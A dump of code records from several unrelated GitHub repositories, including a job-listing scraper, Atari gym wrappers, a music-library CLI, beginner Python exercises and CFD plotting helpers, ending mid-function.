ellipsis fleft').text\r\n \r\n #print(Company)\r\n \r\n #Salary offered\r\n salary_offered_li= job_elem.find('li',class_='fleft br2 placeHolderLi salary')\r\n salary_offered_span = salary_offered_li.find('span',class_='ellipsis fleft ')\r\n if salary_offered_span is None:\r\n continue\r\n else:\r\n salary_offered = salary_offered_span.text\r\n #Rating\r\n rating_span = job_elem.find('span',class_='starRating fleft dot')\r\n if rating_span is None:\r\n Ratings= \"\"\r\n \r\n else:\r\n Ratings = rating_span.text\r\n \r\n #Years of experience required \r\n Years_of_exp_span = job_elem.find('span',class_ = 'ellipsis fleft expwdth')\r\n if Years_of_exp_span is None:\r\n Years_of_exp = \"\"\r\n else:\r\n Years_of_exp = Years_of_exp_span.text\r\n \r\n \r\n #lcoation \r\n location_li= job_elem.find('li',class_='fleft br2 placeHolderLi location')\r\n location_span = location_li.find('span',class_='ellipsis fleft locWdth')\r\n if location_span is None:\r\n location=\"\"\r\n else:\r\n location = location_span.text\r\n \r\n #no of days since posted\r\n post_date_span= job_elem.find('span',class_ = 'fleft postedDate')\r\n if post_date_span is None:\r\n posted_date = \"\"\r\n else:\r\n posted_date = post_date_span.text\r\n \r\n #append to data frame\r\n output_dataframe = output_dataframe.append({'URL':URL,'Title': Title,'Company':Company,'Ratings':Ratings,'Reviews':\"\",'Experience':Years_of_exp,'Salary':salary_offered,'Location':location,'Job_Post_History':posted_date}, ignore_index = True)\r\n print(output_dataframe)","repo_name":"jaiswalvighneshwar/Scraping-job-portal-data-using-python","sub_path":"job_portal_scrapper.py","file_name":"job_portal_scrapper.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10516329628","text":"\"\"\"Fpaths API.\"\"\"\n# %% codecell\nfrom pathlib import Path\n\nimport pandas as pd\n\ntry:\n from scripts.dev.multiuse.help_class import baseDir\n from scripts.dev.multiuse.path_helpers import get_most_recent_fpath\nexcept ModuleNotFoundError:\n from multiuse.help_class import baseDir\n from multiuse.path_helpers import get_most_recent_fpath\n\n# %% codecell\n\n\nclass FpathsAPI():\n \"\"\"Get and return fpath for each API function.\"\"\"\n\n key_dict = {}\n\n def __init__(self, keyword, origin, **kwargs):\n key = f\"{origin}_{keyword}\"\n\n self._ref_data_fpath(self, **kwargs)\n self._iex_hist_fpath(self, **kwargs)\n self._ml_fpath(self, **kwargs)\n\n self.fpath = self.key_dict[key]\n\n @classmethod\n def _ref_data_fpath(cls, self, **kwargs):\n \"\"\"Get ref data fpaths.\"\"\"\n gs_path = Path(baseDir().path, 'errors/gz_sizes.parquet')\n ref_dict = ({\n 'get_sizes': gs_path,\n 'data_files_sizes': Path(baseDir().path, 'logs', 'file_sizes.txt'),\n })\n\n pre = 'ref_data'\n ref_dict = {f\"{pre}_{k}\": v for k, v in ref_dict.items()}\n self.key_dict = self.key_dict | ref_dict\n\n @classmethod\n def _iex_hist_fpath(cls, self, **kwargs):\n \"\"\"Iex historical data fpaths.\"\"\"\n bdir = Path(baseDir().path, 'StockEOD/combined')\n\n # 'all' is misleading - this is really just the most recent\n # combined version. Whereas 'cb_all' is all combined stock data\n iex_hdict = ({\n 'all': get_most_recent_fpath(bdir),\n 'cb_all': (get_most_recent_fpath(\n bdir.parent.joinpath(bdir.stem + '_all')))\n })\n\n pre = 'iex_hist'\n iex_hdict = {f\"{pre}_{k}\": v for k, v in iex_hdict.items()}\n self.key_dict = self.key_dict | iex_hdict\n\n @classmethod\n def _ml_fpath(cls, self, **kwargs):\n \"\"\"Fpaths for machine learning files.\"\"\"\n bdir = Path(baseDir().path, 'ml_data', 'ml_training')\n\n ml_dict = ({\n 'subset_ref': bdir.joinpath('_df_catkeys.parquet'),\n 'subset': bdir.joinpath('_df_processed.parquet')\n })\n\n pre = 'ml'\n ml_dict = {f\"{pre}_{k}\": v for k, v in ml_dict.items()}\n self.key_dict = self.key_dict | ml_dict\n\n\n\n\n\n\n# %% codecell\n\n\n\n\n\n\n\n\n\n\n\n# %% codecell\n","repo_name":"webclinic017/algotrading-20","sub_path":"multiuse/pathClasses/fpaths_api.py","file_name":"fpaths_api.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"2660039372","text":"__all__ = [\n \"CraftError\",\n]\n\nfrom typing import Optional\n\n\nclass CraftError(Exception):\n \"\"\"Signal a program error with a lot of information to report.\"\"\"\n\n message: str\n \"\"\"The main message to the user, to be shown as first line (and probably only that,\n according to the different modes); note that in some cases the log location will be\n attached to this message.\"\"\"\n\n details: Optional[str]\n \"\"\"The full error details received from a third party which originated the error\n situation.\"\"\"\n\n resolution: Optional[str]\n \"\"\"An extra line indicating to the user how the error may be fixed or avoided (to be\n shown together with ``message``).\"\"\"\n\n docs_url: Optional[str]\n \"\"\"An URL to point the user to documentation (to be shown together with ``message``).\"\"\"\n\n logpath_report: bool\n \"\"\"Whether the location of the log filepath should be presented in the screen as the\n final message.\"\"\"\n\n reportable: bool\n \"\"\"If an error report should be sent to some error-handling backend (like Sentry).\"\"\"\n\n retcode: int\n \"\"\"The code to return when the application finishes.\"\"\"\n\n def __init__( # noqa: PLR0913 (too many arguments)\n self,\n message: str,\n *,\n details: Optional[str] = None,\n resolution: Optional[str] = None,\n docs_url: Optional[str] = None,\n logpath_report: bool = True,\n reportable: bool = True,\n retcode: int = 1,\n ) -> None:\n super().__init__(message)\n self.details = details\n self.resolution = resolution\n self.docs_url = docs_url\n self.logpath_report = logpath_report\n self.reportable = reportable\n self.retcode = retcode\n\n def __eq__(self, other: object) -> bool:\n if isinstance(other, CraftError):\n return all(\n [\n self.args == other.args,\n self.details == other.details,\n self.resolution == other.resolution,\n self.docs_url == other.docs_url,\n self.logpath_report == other.logpath_report,\n self.reportable == other.reportable,\n self.retcode == other.retcode,\n ]\n )\n return NotImplemented\n\n\nclass ArgumentParsingError(Exception):\n \"\"\"Exception used when an argument parsing error is found.\"\"\"\n\n\nclass ProvideHelpException(Exception): # noqa: N818 (Exception should have an Error suffix)\n \"\"\"Exception used to provide help to the user.\"\"\"\n","repo_name":"canonical/craft-cli","sub_path":"craft_cli/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"16572929269","text":"import gym\nimport numpy as np\n\n\n## Fire reset wrapper\nclass FireReset(gym.Wrapper):\n \"\"\"Fire reset wrapper for gym.Env.\n Take action \"fire\" on reset.\n\n Args:\n env (gym.Env): The environment to be wrapped.\n \"\"\"\n\n def __init__(self, env):\n super().__init__(env)\n assert env.unwrapped.get_action_meanings()[1] == 'FIRE', (\n 'Only use fire reset wrapper for suitable environment!')\n assert len(env.unwrapped.get_action_meanings()) >= 3, (\n 'Only use fire reset wrapper for suitable environment!')\n\n def step(self, action):\n\n return self.env.step(action)\n\n def reset(self, **kwargs):\n self.env.reset(**kwargs)\n obs, _, done, _ = self.env.step(1)\n\n if done:\n obs = self.env.reset(**kwargs)\n\n return obs\n\n\n## Noop reset env\nclass NoopResetEnv(gym.Wrapper):\n def __init__(self, env, noop_max=30):\n \"\"\"Sample initial states by taking random number of no-ops on reset.\n No-op is assumed to be action 0.\n \"\"\"\n gym.Wrapper.__init__(self, env)\n self.noop_max = noop_max\n self.override_num_noops = None\n self.noop_action = 0\n assert env.unwrapped.get_action_meanings()[0] == 'NOOP'\n\n def _reset(self, **kwargs):\n \"\"\" Do no-op action for a number of steps in [1, noop_max].\"\"\"\n self.env.reset(**kwargs)\n\n if self.override_num_noops is not None:\n noops = self.override_num_noops\n\n else:\n noops = self.unwrapped.np_random.randint(1, self.noop_max + 1) #pylint: disable=E1101\n\n assert noops > 0\n obs = None\n\n for _ in range(noops):\n\n obs, _, done, _ = self.env.step(self.noop_action)\n\n if done:\n obs = self.env.reset(**kwargs)\n\n return obs\n\n\n## Episodic life env\nclass EpisodicLifeEnv(gym.Wrapper):\n \"\"\"Make end-of-life == end-of-episode, but only reset on true game over.\n Done by DeepMind for the DQN since it helps value estimation.\n\n Args:\n env (gym.Env): The environment to be wrapped.\n \"\"\"\n\n def __init__(self, env):\n gym.Wrapper.__init__(self, env)\n self.lives = 0\n self.was_real_done = True\n\n def step(self, action):\n obs, reward, done, info = self.env.step(action)\n self.was_real_done = True\n # check current lives, make loss of life terminal,\n # then update lives to handle bonus lives\n lives = self.env.unwrapped.ale.lives()\n\n if lives < self.lives and lives > 0:\n # for Qbert sometimes we stay in lives == 0 condition for a few frames\n # so its important to keep lives > 0, so that we only reset once\n # the environment advertises done.\n done = True\n self.was_real_done = False\n self.lives = lives\n\n return obs, reward, done, info\n\n def reset(self):\n \"\"\"Reset only when lives are exhausted.\n This way all states are still reachable even though lives are episodic,\n and the learner need not know about any of this behind-the-scenes.\n \"\"\"\n if self.was_real_done:\n obs = self.env.reset()\n self.lives = 0\n\n else:\n # no-op step to advance from terminal/lost life state\n obs, _, _, info = self.env.step(0)\n self.lives = self.env.unwrapped.ale.lives()\n\n return obs\n\n\n## Max and skip env\nclass MaxAndSkipEnv(gym.Wrapper):\n \"\"\"Return only every `skip`-th frame.\n\n Args:\n env (gym.Env): The environment to be wrapped.\n skip (int): The frame mark to be skipped.\n \"\"\"\n def __init__(self, env=None, skip=4):\n super(MaxAndSkipEnv, self).__init__(env)\n # most recent raw observations (for max pooling across time steps)\n self._obs_buffer = np.zeros((2, ) + env.observation_space.shape, dtype=np.uint8)\n self._skip = skip\n\n def step(self, action):\n \"\"\"Repeat action, sum reward, and max over last two observations\"\"\"\n total_reward = 0.0\n done = None\n\n for i in range(self._skip):\n obs, reward, done, info = self.env.step(action)\n\n if i == self._skip - 2:\n self._obs_buffer[0] = obs\n\n elif i == self._skip - 1:\n self._obs_buffer[1] = obs\n\n total_reward += reward\n\n if done:\n break\n\n max_frame = self._obs_buffer.max(axis=0)\n\n return max_frame, total_reward, done, info\n","repo_name":"skorpion21sic/Pong-CNN-DQN","sub_path":"utils/wrappers.py","file_name":"wrappers.py","file_ext":"py","file_size_in_byte":4503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"38519009129","text":"import csv\nfrom pycassa.pool import ConnectionPool\nimport sys\nfrom pycassa.columnfamily import ColumnFamily\n\npool = ConnectionPool('mykeyspace', ['localhost:9042'])\ncf = ColumnFamily(pool, \"NBD\")\n\nwith open('bank-full.csv', 'rb') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n print(str(row))\n key = row['id']\n del row['id']\n cf.insert(key, row)\npool.dispose()","repo_name":"maalekkk/non-relational-databases","sub_path":"src/main/java/com/campaign/banksMarketingCampaign/filler/data_filler.py","file_name":"data_filler.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10154629534","text":"import sys\nimport getopt\nimport logging\n\nfrom gameserver import GameServer\n\n\ndef main(argv):\n help_message = '''\n Usage:\n python3 main.py -p -a -q \n '''\n port = 8586\n web_server_address = \"localhost\"\n web_server_port = 8585\n try:\n opts, _ = getopt.getopt(argv, \"hp:a:q:\", [\"help\", \"port=\", \"address=\", \"qort=\"])\n except getopt.GetoptError:\n print(help_message)\n sys.exit(2)\n for opt, arg in opts:\n if opt in (\"-h\", \"--help\"):\n print(help_message)\n sys.exit()\n elif opt in (\"-p\", \"--port\"):\n port = int(arg)\n elif opt in (\"-a\", \"--address\"):\n web_server_address = arg\n elif opt in (\"-q\", \"--qort\"):\n web_server_port = int(arg)\n gs = GameServer(web_server_address, web_server_port, port)\n gs.run()\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG)\n main(sys.argv[1:])\n","repo_name":"Parsa2820/cn-homeworks","sub_path":"hw1/game-server/maings.py","file_name":"maings.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33133677467","text":"# !/usr/bin/python\nfrom __future__ import print_function # Backwards Compatibility: Ensures that built in print function from <3.0 Python prints string instead of tupleself.\nfrom music_datastore import *\nfrom input_error import InputError\nfrom extractor import *\nimport sys, os\n\nscript_dir = os.path.dirname(__file__) #<-- absolute dir the script is in\nrel_path = \"sample_in.txt\"\nfile_name = os.path.join(script_dir, rel_path)\n\ndef main():\n MusicDatastore.instance = MusicDatastore() # Sets up MusicDatastore\n main_loop()\n\ndef educate_this_user():\n print(\"There are 3 main arguments: add, list, and listen.\")\n print(hilite(\"----ADD COMMAND----\", 1, True))\n print(\"The add command has 3 sub arguments: artist, album, and track.\")\n print(\"Before adding an album, the artist must exist.\")\n print(\"Before adding a track, the album and artist must exist.\")\n print(\"USAGE: add artist bob\")\n print('USAGE: add album \"The amazing race\" by bob')\n print('USAGE: add track \"Great song\" on \"The amazing race\" by bob')\n print(hilite(\"----LIST COMMAND----\", 1, True))\n print(\"The list command has 3 subcommands and 1 optional value: artists, albums, tracks, and [top].\")\n print(\"USAGE: list artists\")\n print(\"USAGE: list albums by bob\")\n print(\"USAGE: list tracks on \\\"The amazing race\\\" by bob\")\n print(\"USAGE: list top q albums\")\n print(\"USAGE: list top 3 tracks\")\n print(hilite(\"----LISTEN COMMAND----\", 1, True))\n print(\"This command increments the play count on a track. You must provide the track, album, and artist.\")\n print(\"USAGE: listen to \\\"song\\\" on \\\"album name\\\" by bob\")\n print(hilite(\"----END----\", True, True))\n\ndef process_user_input(line):\n if line.lower() == \"quit\".lower():\n sys.exit(1)\n elif line.lower() == \"help\".lower():\n educate_this_user()\n else:\n decipher_command(line)\n\n# Reads sample input file from scripts directory and runs it as if imitating a user\ndef read_input():\n with open(file_name) as f:\n for line in f:\n try:\n print(line.rstrip(\"\\n\"))\n decipher_command(line.rstrip(\"\\n\"))\n except InputError as e:\n print(hilite(\"Input Error:\", -1, True), e.value)\n pass\n\ndef decipher_command(line):\n raw_commands = line.split(\" \") # Main data structure used to interpret user data.\n if len(raw_commands) < 1:\n raise InputError('Incorrect usage. Need more info. Type help for examples.')\n\n # Process main commands\n primary_commands = ['add', 'list', 'listen']\n if sanitize_command(raw_commands, primary_commands, 0) == True:\n funcdict[raw_commands[0]](raw_commands)\n else:\n raise InputError(\"First argument is invalid. Use one of these\", primary_commands)\n\n# command_add handles all logic of the 'add' command and subcommands after the we've determined the user wants to add something\ndef command_add(raw_commands):\n valid_commands = ['artist', 'album', 'track']\n if sanitize_command(raw_commands, valid_commands, 1) == False:\n raise InputError(\"Sub command is invalid. Use valid arguments: \", valid_commands, \"after add\")\n return\n subcommand_index = 2\n if raw_commands[1] == 'artist': # check to lower\n artist_name, count = get_artist_info(raw_commands, subcommand_index)\n get_music_datastore().add_artist(artist_name)\n elif raw_commands[1] == 'album':\n album_name, artist_name = get_album_info(raw_commands, subcommand_index)\n get_music_datastore().add_album(album_name, artist_name)\n elif raw_commands[1] == 'track':\n track_name, album_name, artist_name = get_track_info(raw_commands, subcommand_index)\n get_music_datastore().add_track(track_name, album_name, artist_name)\n else:\n print(\"ERR: command_add\")\n\n# command_list handles all logic to display lists and handling subcommands after we've determine the user wants to list something\ndef command_list(raw_commands):\n valid_commands = ['top', 'albums', 'tracks', 'artists']\n if sanitize_command(raw_commands, valid_commands, 1) == False:\n raise InputError(\"Sub argument is invalid. Use valid arguments: \", valid_commands, \"after list\")\n\n if raw_commands[1] == 'top':\n value, count = next_input(raw_commands, 2)\n if count < 0:\n raise InputError(\"Please enter how many to print. To print all value input 'q'\")\n if not value.isdigit() and value != 'q':\n raise InputError(\"Sub argument is invalid. Use a number or letter 'q'\")\n if value == 'q':\n desired_count = -1\n else:\n desired_count = int(value)\n\n valid_commands = ['artists','tracks', 'albums']\n if sanitize_command(raw_commands, valid_commands, 3) == False:\n raise InputError(\"Sub argument is invalid. Use valid commands: \", valid_commands)\n desired_category = raw_commands[3]\n\n if desired_category == 'artists':\n get_music_datastore().list_top_artists(desired_count)\n elif desired_category == 'tracks':\n get_music_datastore().list_top_tracks(desired_count)\n elif desired_category == 'albums':\n get_music_datastore().list_top_albums(desired_count)\n else:\n print(\"ERR: command_list top\")\n else:\n valid_commands = ['albums', 'tracks', 'artists']\n if sanitize_command(raw_commands, valid_commands, 1) == False:\n raise InputError(\"Sub argument (\", raw_commands[1], \") is invalid. Use valid argument: \", valid_commands)\n desired_category = raw_commands[1]\n if desired_category == 'albums':\n result = get_album_info(raw_commands, 1)\n get_music_datastore().list_albums(result)\n elif desired_category == 'tracks':\n result = get_track_info(raw_commands, 1)\n get_music_datastore().list_tracks(result)\n elif desired_category == 'artists':\n get_music_datastore().list_artists()\n else:\n print(\"ERR: command_list normal\", raw_commands)\n\n# command_listen handles logic to find a desired track and increment it's play_count\ndef command_listen(raw_commands):\n if len(raw_commands) < 4:\n raise InputError(\"Command usage: listen to \\\"song\\\" on \\\"album\\\" by \\\"artist\\\"\")\n track_values = get_track_info(raw_commands, 2)\n get_music_datastore().listen_to(track_values)\n\n# Abstraction for string emphasis. Useful in a bland CLI\ndef hilite(string, status, bold):\n attr = []\n if status == 1:\n attr.append('32') # green\n elif status == -1:\n attr.append('31') # Red\n if bold:\n attr.append('1')\n return '\\x1b[%sm%s\\x1b[0m' % (';'.join(attr), string)\n\ndef run_test():\n # automated = ['add artist bob',\n # 'add album foo by bob',\n # 'list albums by bob',\n # 'add track \"sunday blues\" on foo by bob',\n # 'add track \"crushed heart\" on foo by bob',\n # 'add track \"rock on\" on foo by bob',\n # 'list tracks on foo by bob',\n # 'listen to \"sunday blues\" on foo by bob',\n # 'list top 3 tracks',\n # 'add artist \"Smiling Lemurs\"',\n # 'add album \"Sunbeams and Snowdrifts\" by \"Smiling Lemurs\"',\n # 'list top 3 albums',\n # 'list top 3 artists']\n # for user_input in automated:\n # user_input = str(user_input.strip())\n # process_user_input(user_input.rstrip(\"\\n\"))\n return\n\ndef main_loop():\n has_read_from_file = False\n run_test()\n if len(sys.argv) > 1:\n file_name = sys.argv[1]\n\n print(\"Welcome to Music Manager. Type help to get started or\", hilite(\"quit\", 1, True) ,\"to quit, or\", hilite(\"help\", 1, True), \"for help.\")\n while True:\n try:\n # raw_input was renamed to input in Python3.0, this allows support for 2.7 which is widely and 2.6 which is stock on Mac machines.\n try: user_input = raw_input(\"\")\n except NameError:\n pass\n user_input = input(\"\")\n\n user_input = str(user_input.rstrip(\"\\n\").strip()) # Strip newline, strip outter tabs and spaces\n process_user_input(user_input)\n except InputError as e:\n print(hilite(\"Input Error:\", -1, True), e.value)\n pass\n\n# Dictionary to functions\nfuncdict = {\n 'add': command_add,\n 'listen': command_listen,\n 'list': command_list\n}\n\nmain() # Initial point of execution. Runs the program.\n","repo_name":"DrewWeth/Etsy_Proj","sub_path":"source/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30661231300","text":"#--------------------------------------------------------------------------------------------\n\n''' #Exercise 1 : \nFaça um programa que peça dois números inteiros e imprima a soma desses dois números '''\nnumeros = list()\nsoma = 0\n#Recebendo os valores e adicionando no array numeros[]\nfor x in range (0,2):\n print(\"Digite o \",x+1,\"numero:\")\n numeros.append(int(input()))\n #somando o valor recebido no array numeros[]\n soma += numeros[x]\n#printando o valor da soma depois de ter perguntado os 2 valores no FOR acima\nprint(\"SOMA:\",soma,\"\\n \\n \\n \\n \\n\")\n#--------------------------------------------------------------------------------------------\n\n''' #Exercise 2 : \nEscreva um programa que leia um valor em metros e o exiba convertido em milímetros '''\n#Recebendo o valor em metros\nmetros = int(input(\"Digite o valor em metros: \"))\n#Imprimindo em Milimetros(metros * 1000)\nprint(metros*1000,\"MM\\n \\n \\n \\n \\n\")\n\n\n#--------------------------------------------------------------------------------------------\n\n''' #Exercise 3 : \nEscreva um programa que leia a quantidade de dias, horas, minutos e segundos do usuário. Calcule\no total em segundos. '''\n\n#Recebendo os valores de Dias, horas, minutos e segundos\ndias = int(input(\"Digite quantidade de dias: \"))\ndias *= 86400\nhoras = int(input(\"Digite quantidade em horas:\"))\nhoras *= 3600\nminutos = int(input(\"Digite quantidade em minutos:\"))\nminutos *=60\nsegundos = int(input(\"Digite quantidade em segundos:\"))\n#somando o total em segundos\nsegundos +=dias+horas+minutos\n#Imprimindo o valor\nprint(\"Total em segundos:\",segundos,\"\\n \\n \\n \\n \\n\")\n\n#--------------------------------------------------------------------------------------------\n\n''' #Exercise 4 : \nFaça um programa que calcule o aumento de um salário. Ele deve solicitar o valor do salário e a\nporcentagem do aumento. Exiba o valor do aumento e do novo salário. '''\n#Recebendo os valores\nsal_atual = float(input(\"Digite seu salario atual: \"))\npor_aumento = float(input(\"Digite porcentagem de aumento:\"))\n#Calculando o aumento e o novo salário\naumento = (sal_atual*por_aumento)/100\nnovo_sal = aumento + sal_atual\n#printando na tela os resultados\nprint(\"O valor do aumento sera: \",aumento)\nprint(\"O novo salario sera: \",novo_sal, \"\\n \\n \\n \\n \\n\")\n\n\n#--------------------------------------------------------------------------------------------\n\n''' #Exercise 5 : \nSolicite o preço de uma mercadoria e o percentual de desconto. Exiba o valor do desconto e o\npreço a pagar. '''\n#Recebendo os valores\npreco = float(input(\"Digite o valor da mercadoria: \"))\npercent_desc = float(input(\"Digite o percentual de desconto: \"))\n#Calculando os descontos\ndesconto = (preco*percent_desc)/100\nnovo_valor = desconto + preco\n# Imprimindo o resultado\nprint(\"Valor do desconto: \",desconto,\"R$\")\nprint(\"Novo valor: \",novo_valor,\"R$ \\n \\n \\n \\n \\n\")\n\n#--------------------------------------------------------------------------------------------\n\n''' #Exercise 6 : \nCalcule o tempo de uma viagem de carro. Pergunte a distância a percorrer e a velocidade média\nesperada para a viagem. '''\n#Recebendo DeltaS e VM\ndist = float(input(\"Digite a distancia da viagem em KM: \"))\nvm = float(input(\"Digite a velocidade madia esperada KM/H: \"))\n#calculando com a formula de Velocidade média\ndt = vm/dist\n#imprimindo o resultado\nprint(\"O tempo estimado de viagem e: \",dt,\"horas \\n \\n \\n \\n \\n\")\n\n#--------------------------------------------------------------------------------------------\n\n''' #Exercise 7 : \nConverta uma temperatura digitada em Celsius para Fahrenheit. F = 9*C/5 + 32'''\n#Recebendo o valor em celsius\ncelsius = float(input(\"Digite a temperatura em Celsius: \"))\n#convertendo de celsius para fahrenheit com a equação mencionada acima\nfahren = ((9*celsius)/5)+32\n#imprimindo o resultado\nprint(\"F : \",fahren,\"\\n \\n \\n \\n \\n\")\n\n#--------------------------------------------------------------------------------------------\n\n''' #Exercise 8 : \nFaça agora o contrário, de Fahrenheit para Celsius. C/5 = F−32/9'''\n#Recebendo o valor em fahrenheit\nfahren = float(input(\"Digite a temperatura em Fahrenheit: \"))\n#convertendo de fahrenheit para celsius com a equação mencionada acima\ncelsius = ((fahren-32)/9) * 5\n#imprimindo o resultado\nprint(\"Celsius C %.2f \\n\\n\\n\\n\\n\\n\\n\\n \" %celsius)\n\n#--------------------------------------------------------------------------------------------\n\n''' #Exercise 9 : \nEscreva um programa que pergunte a quantidade de km percorridos por um carro alugado pelo\nusuário, assim como a quantidade de dias pelos quais o carro foi alugado. Calcule o preço a pagar,\nsabendo que o carro custa R$ 60,00 por dia e R$ 0,15 por km rodado.'''\n#recebendo os dados\nkm = float(input(\"Quantidade de KM percorridos: \"))\ndias = int(input(\"Quantidade de dias alugados: \"))\n#imprimindo o resultado conforme a conta acima: 60 por dia x 15 cent. por km\nprint(\"Total R$: %.2f \\n\\n\\n\\n\\n\\n\\n\"% ((dias*60)+(km*0.15)))\n\n#--------------------------------------------------------------------------------------------\n\n''' #Exercise 10 : \nEscreva um programa para calcular a redução do tempo de vida de um fumante. Pergunte a\nquantidade de cigarros fumados por dia e quantos anos ele já fumou. Considere que um fumante\nperde 10 minutos de vida a cada cigarro, calcule quantos dias de vida um fumante perderá. Exiba o\ntotal de dias.'''\n#recebendo os valores\ncig = int(input(\"Favor, digite quantos cigarros fumados por dia: \"))\nanos = int(input(\"Favor, digite quantos anos ja fumou:\"))\n#calculando quantos dias de vida perderá cigarros fumados por dia x 10 (pra ter o valor em minutos por dia),\n#anos x 365 (para ter o valor de anos em dias), multiplica o valor de minutos por dia x total de dias (para ter o valor total em minutos)\n# e divide por 1440 para converter o valor de minutos para dias, pois 1440 minutos = 1dia\nprint(\"Voce perdera %d dias de sua vida \\n\\n\\n\\n\\n\\n\\n\\n\" %((cig*10)*(anos*365)/1440))\n\n\n#--------------------------------------------------------------------------------------------\n\n''' #Exercise 11 : \nSabendo que str( ) converte valores numéricos para string, calcule quantos dígitos há em 2 elevado\na um milhão. '''\n#imprimindo o solicitado convertendo int para str e pegando a quantidade de algarismos através do len\nprint (\"Existem %s digitos em 2^1000000\" %len(str(2**1000000)))\n#teste teste\n\n#--------------------------------------------------------------------------------------------\n\n","repo_name":"alanPaivaAsp/PythonList","sub_path":"list1/list1.py","file_name":"list1.py","file_ext":"py","file_size_in_byte":6442,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"33587311168","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\n#from src.utils.InitialConds import ReadFile\nimport os\nimport argparse\n\nSIM = \"folder\"\n\ndef ReadFile(filename):\n\n data = []\n\n with open(filename) as f:\n for line in f.readlines():\n data.append(float(line.strip()))\n \n return np.array(data, dtype=float)\n\ndef ReadFile2(filename):\n\n data = []\n\n with open(filename) as f:\n for line in f.readlines():\n data.append((line.strip()))\n \n return data\n\ndef SIMPLE_convergence(residuals, SIM_num):\n\n u_conv = []\n v_conv = []\n for residual in residuals:\n residual_it = residual.strip().strip(\"[]\").split(\",\")\n u_conv.append(float(residual_it[0]))\n v_conv.append(float(residual_it[1]))\n\n plt.plot(range(len(residuals)), u_conv, label=\"U Residuals\")\n plt.plot(range(len(residuals)), v_conv, label=\"V Residuals\")\n plt.legend()\n plt.xlabel(\"SIMPLE Iteration\")\n plt.ylabel(\"Residual\")\n plt.title(\"SIMPLE Outer Loop Convergence\")\n plt.savefig(f\"Results/{SIM}/SIM {SIM_num}/SIMPLE_conv_curve.png\")\n\ndef momentum_convergence(residuals_x, residuals_y, SIM_num):\n\n initial_x = []\n final_x = []\n initial_y = []\n final_y = []\n for i in range(len(residuals_x)):\n residual_x_it = residuals_x[i].strip().strip(\"[]\").split(\",\")\n residual_y_it = residuals_y[i].strip().strip(\"[]\").split(\",\")\n initial_x.append(float(residual_x_it[0]))\n final_x.append(float(residual_x_it[1]))\n initial_y.append(float(residual_y_it[0]))\n final_y.append(float(residual_y_it[1]))\n \n plt.plot(range(len(initial_x)), initial_x, label=\"Initial Residuals\")\n plt.plot(range(len(final_x)), final_x, label=\"Final Residuals\")\n plt.legend()\n plt.xlabel(\"SIMPLE Iteration\")\n plt.ylabel(\"Residual\")\n plt.title(\"U Inner Loop Convergence\")\n plt.savefig(f\"Results/{SIM}/SIM {SIM_num}/u_inner_loop_conv.png\")\n plt.close()\n\n plt.plot(range(len(initial_y)), initial_y, label=\"Initial Residuals\")\n plt.plot(range(len(final_y)), final_y, label=\"Final Residuals\")\n plt.legend()\n plt.xlabel(\"SIMPLE Iteration\")\n plt.ylabel(\"Residual\")\n plt.title(\"V Inner Loop Convergence\")\n plt.savefig(f\"Results/{SIM}/SIM {SIM_num}/v_inner_loop_conv.png\")\n plt.close()\n\ndef pressure_convergence(residuals, SIM_num):\n\n initial = []\n final = []\n for residual in residuals:\n residual_it = residual.strip().strip(\"[]\").split(\",\")\n initial.append(float(residual_it[0]))\n final.append(float(residual_it[1]))\n\n plt.plot(range(len(residuals)), initial, label=\"Initial Residuals\")\n plt.plot(range(len(residuals)), final, label=\"Final Residuals\")\n plt.legend()\n plt.xlabel(\"SIMPLE Iteration\")\n plt.ylabel(\"Residual\")\n plt.title(\"Pressure Inner Loop Convergence\")\n plt.savefig(f\"Results/{SIM}/SIM {SIM_num}/p_inner_loop_conv.png\")\n plt.close()\n\ndef velocity_field_plot(ux_field, uy_field, uz_field, SIM_num, ncells, d):\n \n quiver_step = 2\n print(ncells, len(ux_field))\n ux_field = np.pad(np.flip(np.reshape(ux_field, (ncells, ncells)), axis=0), (1,1))\n uy_field = np.pad(np.flip(np.reshape(uy_field, (ncells, ncells)), axis=0), (1,1))\n uz_field = np.pad(np.flip(np.reshape(uz_field, (ncells, ncells)), axis=0), (1,1))\n x, y = np.meshgrid(np.linspace(0, ux_field.shape[0], ux_field.shape[1]), np.linspace(0, ux_field.shape[1], ux_field.shape[0]))\n\n # setting moving wall\n ux_field[0,:] = 1\n\n mags = np.linalg.norm(np.dstack((ux_field, uy_field)), axis=2)\n axis_positions = np.linspace(0, len(ux_field)-1, 6)\n axis_labels = [round((d/len(axis_positions)), 2) * i for i in range(len(axis_positions))]\n\n fig, ax = plt.subplots()\n ax.quiver(x[::quiver_step,::quiver_step], y[::quiver_step,::quiver_step], ux_field[::quiver_step,::quiver_step], uy_field[::quiver_step,::quiver_step])\n im = ax.imshow(mags, interpolation=\"spline16\", cmap=\"jet\")\n ax.set_xticks(axis_positions)\n ax.set_xticklabels(axis_labels)\n ax.set_yticks(axis_positions)\n axis_labels.reverse()\n ax.set_yticklabels(axis_labels)\n clb = fig.colorbar(im)\n clb.ax.set_title(\"m/s\")\n ax.set_title(\"Velocity Field\")\n plt.savefig(f\"Results/{SIM}/SIM {SIM_num}/velocity_field.png\")\n return ax\n\ndef field(field, SIM_num, ncells, d, filename):\n\n if filename == \"x\":\n field = np.pad(np.flip(np.reshape(field, (ncells, ncells)), axis=0), (1,1))\n field[0,:] = 